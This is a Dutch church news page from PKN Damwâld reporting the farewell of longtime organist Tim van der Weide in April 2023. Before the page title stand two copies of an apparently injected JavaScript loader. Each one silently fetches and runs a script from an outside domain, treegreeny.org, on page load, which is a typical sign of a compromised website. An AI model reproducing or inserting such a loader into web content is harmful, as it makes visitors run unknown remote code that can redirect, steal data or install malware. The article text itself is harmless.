;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheid van Tim van der Weide als organist - PKN Damwâld

Afscheid van Tim van der Weide als organist

Gepubliceerd op: donderdag 20 april 2023

Tijdens de gemeenteavond van Gereformeerd Damwâld op 19 april 2023 werd onder luid applaus afscheid genomen van Tim van der Weide als organist van onze beide PKN-kerken in Damwâld. Tim was ruim 15 jaar onze vaste organist, maar zijn gezondheid ging de laatste tijd wat achteruit en het ‘organist-zijn’ werd hem te zwaar. Uiteraard waren er, ondermeer van de (interim-) voorzitter van de kerkenraad Durk Gros en collega-organist Margrietha Zagema, veel lovende woorden voor al zijn werkzaamheden als organist en voor het zeer verdienstelijk orgelspel in al die jaren. Tim kreeg van het College Kerkrentmeesters een onderscheiding en een oorkonde uitgereikt van de Vereniging voor Kerkrentmeesterlijk Beheer. Naast organist is Tim ook een zeer gewaardeerd componist van koorwerken. Net als zijn echtgenote Johanna, die helaas in 2022 overleed, was Tim naast organist ook dirigent bij diverse koren. In de muziek stimuleerden zij elkaar, en het gaf vreugde dat de muzikaliteit en de creativiteit ook overging naar hun kinderen. Ze genoten samen van wat ze rond diensten en optredens met de koren en in de wereld van de musici meemaakten.

Tim, hij was 40 jaar muziekleraar van beroep en gaf ondermeer les en begeleiding aan moeilijk lerende kinderen, werd hier organist toen hij met zijn gezin in Damwâld kwam te wonen en de meeste gemeenteleden herkenden het direct wanneer hij achter het orgel zat. Zijn stijl was kenmerkend en Tim speelde altijd met veel gevoel en met veel liefde. Veel gemeenteleden hebben genoten van zijn stijl en daarom is het jammer dat aan zijn orgelspel bij ons een einde komt. We willen hem op deze wijze hartelijk bedanken voor zijn bijdrage aan de erediensten en wensen hem Gods zegen toe.